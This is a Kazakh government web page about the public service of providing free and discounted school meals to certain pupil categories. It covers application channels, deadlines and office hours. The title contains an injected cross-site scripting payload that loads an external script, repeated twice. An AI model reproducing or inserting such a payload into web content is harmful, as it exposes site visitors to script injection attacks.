"Жалпы білім беретін мектептердегі білім алушылар мен тәрбиеленушілердің жекелеген санаттарына тегін және жеңілдікпен тамақтандыруды ұсыну" мемлекеттік көрсетілетін қызметі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.10.2021

 

"Жалпы білім беретін мектептердегі білім алушылар мен тәрбиеленушілердің жекелеген санаттарына тегін және жеңілдікпен тамақтандыруды ұсыну" мемлекеттік қызметі Қазақстан Республикасы Білім және ғылым министрінің 2020 жылғы 24 сәуірдегі №158 бұйрығы негізінде көрсетіледі.

Көрсетілетін қызметті алушылар мемлекеттік қызметті алу үшін аудандық білім бөліміне немесе білім беру ұйымына (мектептерге) осы Қағидаларға 1-қосымшаға сәйкес өтініш береді.

Өтініштерді қабылдау және Мемлекеттік қызмет көрсету нәтижелерін беру:

1) көрсетілетін қызметті берушінің кеңсесі;

2) "электрондық үкіметтің" веб-порталы арқылы жүзеге асырылады www.egov.kz

Мемлекеттік қызметті көрсету нысаны: электрондық (ішінара автоматтандырылған) және (немесе) қағаз түрінде.

Мемлекеттік қызметті көрсету мерзімдері: көрсетілетін қызметті берушіге құжаттарды тапсырған сәттен бастап, сондай – ақ порталға жүгінген кезде-бес жұмыс күні. Құжаттарды қабылдау сәті Мемлекеттік қызмет көрсету мерзіміне кірмейді.

Мемлекеттік қызметті көрсету нәтижесі – жалпы білім беретін мектепте тегін және жеңілдікпен тамақтандыруды ұсыну туралы анықтама немесе мемлекеттік қызметті көрсетуден дәлелді бас тарту.

Жұмыс кестесі:

1) көрсетілетін қызметті берушінің – Қазақстан Республикасының еңбек заңнамасына сәйкес демалыс және мереке күндерін қоспағанда, дүйсенбіден бастап жұманы қоса алғанда, белгіленген жұмыс кестесіне сәйкес сағат 13.00-ден 14.30-ға дейінгі түскі үзіліспен сағат 09.00-ден 18.30-ға дейін;

2) портал – тәулік бойы.

 

Просмотров: 1280


Пікір қосу



Деректерді қолтаңбаға қосу